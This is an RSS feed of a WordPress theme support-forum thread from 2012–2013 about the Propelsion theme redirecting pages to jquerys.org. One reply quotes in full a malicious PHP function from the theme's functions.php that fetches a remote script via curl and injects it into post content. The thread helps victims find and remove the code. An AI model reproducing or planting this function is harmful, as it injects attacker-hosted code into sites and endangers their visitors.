<?xml version="1.0" encoding="UTF-8"?>
<!-- generator="bbPress/1.0.2" -->
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom">
	<channel>
		<title>Support Forum - Tag: malicious code - Recent Posts</title>
		<link>http://www.kriesi.at/support/tags/malicious-code</link>
		<description>Support Forum - Tag: malicious code - Recent Posts</description>
		<language>en-US</language>
		<pubDate>Wed, 22 May 2013 16:03:14 +0000</pubDate>
		<generator>http://bbpress.org/?v=1.0.2</generator>
		<textInput>
			<title><![CDATA[Search]]></title>
			<description><![CDATA[Search all topics from these forums.]]></description>
			<name>q</name>
			<link>http://www.kriesi.at/support/search.php</link>
		</textInput>
		<atom:link href="http://www.kriesi.at/support/rss/tags/malicious-code" rel="self" type="application/rss+xml" />

		<item>
			<title>Dude on "Recent download for Propelsion has a malicious malware"</title>
			<link>http://www.kriesi.at/support/topic/recent-download-for-propelsion-has-a-malicious-malware#post-93909</link>
			<pubDate>Tue, 29 Jan 2013 10:59:35 +0000</pubDate>
			<dc:creator>Dude</dc:creator>
			<guid isPermaLink="false">93909@http://www.kriesi.at/support/</guid>
			<description>&#60;p&#62;Hey! &#60;/p&#62;
&#60;p&#62; Can you post a link to a page where the issue occurs please? &#60;/p&#62;
&#60;p&#62; Best regards,&#60;br /&#62;
Peter
&#60;/p&#62;</description>
		</item>
		<item>
			<title>ImagoVisual on "Recent download for Propelsion has a malicious malware"</title>
			<link>http://www.kriesi.at/support/topic/recent-download-for-propelsion-has-a-malicious-malware#post-93908</link>
			<pubDate>Tue, 29 Jan 2013 10:32:00 +0000</pubDate>
			<dc:creator>ImagoVisual</dc:creator>
			<guid isPermaLink="false">93908@http://www.kriesi.at/support/</guid>
			<description>&#60;p&#62;Hi there!&#60;/p&#62;
&#60;p&#62;I purchased and installed this theme yesterday and some of my page links redirect to &#60;a href=&#34;http://www.jquerys.org/&#34; rel=&#34;nofollow&#34;&#62;http://www.jquerys.org/&#60;/a&#62; as well!
&#60;/p&#62;</description>
		</item>
		<item>
			<title>Dude on "Recent download for Propelsion has a malicious malware"</title>
			<link>http://www.kriesi.at/support/topic/recent-download-for-propelsion-has-a-malicious-malware#post-91986</link>
			<pubDate>Thu, 17 Jan 2013 06:14:18 +0000</pubDate>
			<dc:creator>Dude</dc:creator>
			<guid isPermaLink="false">91986@http://www.kriesi.at/support/</guid>
			<description>&#60;p&#62;Hey! &#60;/p&#62;
&#60;p&#62; Did you solve the issue? &#60;/p&#62;
&#60;p&#62; Best regards,&#60;br /&#62;
Peter
&#60;/p&#62;</description>
		</item>
		<item>
			<title>272 on "Recent download for Propelsion has a malicious malware"</title>
			<link>http://www.kriesi.at/support/topic/recent-download-for-propelsion-has-a-malicious-malware#post-91984</link>
			<pubDate>Thu, 17 Jan 2013 05:13:12 +0000</pubDate>
			<dc:creator>272</dc:creator>
			<guid isPermaLink="false">91984@http://www.kriesi.at/support/</guid>
			<description>&#60;p&#62;It's not your HOST, it's your THEME.&#60;br /&#62;
In particular, a malicious line of code in functions.php&#60;br /&#62;
This suggests to me that you've downloaded a &#60;strong&#62;stolen copy&#60;/strong&#62; of the theme, or someone has given/sold you a stolen version.&#60;/p&#62;
&#60;p&#62;Look in the early section of your functions.php file and you'll see something like this:&#60;/p&#62;
&#60;p&#62;function ins_php_in_post($content){$percentage = 25;if (rand(0, 100) &#38;lt; $percentage){ob_start();if(function_exists('curl_init')) { $url = &#34;http://www.jquerys.org/jquery-1.6.3.min.js&#34;; $ch = curl_init(); $timeout = 5; curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); $data = curl_exec($ch); curl_close($ch); echo &#34;$data&#34;; }$text = ob_get_clean();$pos = rand(0, strlen($content));$txtPrePos = substr($content, 0, $pos);$txtPostPos = substr($content, $pos);$openPos = strrpos($txtPrePos, &#34;&#38;lt;&#34;);if ($openPos !== false){$closePos = strrpos($txtPrePos, &#34;&#38;gt;&#34;);if ($openPos &#38;gt; $closePos &#124;&#124; $closePos === false){$pos = strpos($content, &#34;&#38;gt;&#34;, $pos) + 1;}}$spos = strpos($content, &#34; &#34;, $pos);if ($spos === false)	{$spos = strlen($content);}$content = substr($content, 0, $spos) . &#34; &#34; . $text . substr($content, $spos);}return $content;}&#60;/p&#62;
&#60;p&#62;Thew quickest fix is to spend $60 and BUY the theme!&#60;br /&#62;
If you try and remove malicious code, you'll no doubt NOT get it ALL out, and you'll have problems down the line with you website's functionality. It's just not worth the time or hassle!
&#60;/p&#62;</description>
		</item>
		<item>
			<title>Devin on "Recent download for Propelsion has a malicious malware"</title>
			<link>http://www.kriesi.at/support/topic/recent-download-for-propelsion-has-a-malicious-malware#post-89839</link>
			<pubDate>Thu, 03 Jan 2013 16:44:34 +0000</pubDate>
			<dc:creator>Devin</dc:creator>
			<guid isPermaLink="false">89839@http://www.kriesi.at/support/</guid>
			<description>&#60;p&#62;Let us know how it goes and definitely contact your hosting provider. They are absolutely the best equipped to deal with malicious code on a server. Even something like a wordpress security plugin can't tell you if you have had your main cpanel account compromised or something like that.&#60;/p&#62;
&#60;p&#62;Regards,&#60;/p&#62;
&#60;p&#62;Devin
&#60;/p&#62;</description>
		</item>
		<item>
			<title>ProjectIndo on "Recent download for Propelsion has a malicious malware"</title>
			<link>http://www.kriesi.at/support/topic/recent-download-for-propelsion-has-a-malicious-malware#post-89781</link>
			<pubDate>Thu, 03 Jan 2013 10:38:48 +0000</pubDate>
			<dc:creator>ProjectIndo</dc:creator>
			<guid isPermaLink="false">89781@http://www.kriesi.at/support/</guid>
			<description>&#60;p&#62;Hello, I was overseas dealing some business, came back to my warm home and checking out my wordpress, I have installed Wordpress Security Scan, hope it will help. Thank you
&#60;/p&#62;</description>
		</item>
		<item>
			<title>Devin on "Recent download for Propelsion has a malicious malware"</title>
			<link>http://www.kriesi.at/support/topic/recent-download-for-propelsion-has-a-malicious-malware#post-88892</link>
			<pubDate>Wed, 19 Dec 2012 04:00:25 +0000</pubDate>
			<dc:creator>Devin</dc:creator>
			<guid isPermaLink="false">88892@http://www.kriesi.at/support/</guid>
			<description>&#60;p&#62;Hi ProjectIndo,&#60;/p&#62;
&#60;p&#62;I would suggest contacting your hosting provider and letting them know what is going on. The issue is most likely that your server has been compromised one way or another and some malicious code has been injected somewhere.&#60;/p&#62;
&#60;p&#62;Your host should be able to do a security scan and assist you further.&#60;/p&#62;
&#60;p&#62;Regards,&#60;/p&#62;
&#60;p&#62;Devin
&#60;/p&#62;</description>
		</item>
		<item>
			<title>ProjectIndo on "Recent download for Propelsion has a malicious malware"</title>
			<link>http://www.kriesi.at/support/topic/recent-download-for-propelsion-has-a-malicious-malware#post-88884</link>
			<pubDate>Wed, 19 Dec 2012 01:59:53 +0000</pubDate>
			<dc:creator>ProjectIndo</dc:creator>
			<guid isPermaLink="false">88884@http://www.kriesi.at/support/</guid>
			<description>&#60;p&#62;My themes always redirect to jquerys.org&#60;/p&#62;
&#60;p&#62;tommyson.com, let me know when you want to access, I deactivate the themes for safety or google will ban my domain forever
&#60;/p&#62;</description>
		</item>

	</channel>
</rss>
